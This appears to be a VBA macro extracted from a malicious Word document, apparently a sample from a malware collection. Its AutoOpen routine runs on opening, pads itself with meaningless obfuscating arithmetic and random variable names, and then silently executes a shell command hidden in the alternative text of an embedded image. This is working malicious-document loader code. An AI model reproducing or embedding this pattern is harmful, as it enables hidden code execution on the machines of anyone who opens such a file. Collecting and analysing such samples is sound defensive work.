Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()


  GlqRZVjlfdGw = 6 / 2
  GlqRZVjlfdGw = GlqRZVjlfdGw - 1
If ((908 + 8288) > 1285 Or (4541 - 5307) > 1285) And (190 - MiZlkibjGZ) > 5488 Then
   RQdWGjflQPiz = #6/2/2034#
   hPkvcvdpLfZ = CDate(5488 - lVTRtgwFcaX - rCXkKkVSHDxD - pTlMdWxjWvgW - qXcTCaQqnDjkaWK)
   lBZFMDVLXRwS = FormatCurrency(93221060.64)
End If
If ((2540 + 3178) > 4915 Or (8571 - 1852) > 4915) And (2590 - DRSrqCbkCsgchbG) > 1333 Then
   kQTLlgCjhQhPxq = #9/9/2071#
   SqhlcKfgWTVMdDq = CDate(1333 - FzHBkQhTQhqMd - qDPTnKfhxLfT - bQsvZKHCakv - GTRJkFhzNNatXfF)
   LgnaTmsist = FormatCurrency(92651397.77)
End If
  Interaction.Shell# InlineShapes(1 + GlqRZVjlfdGw - 1).AlternativeText, 0

End Sub



INQUEST-PP=macro
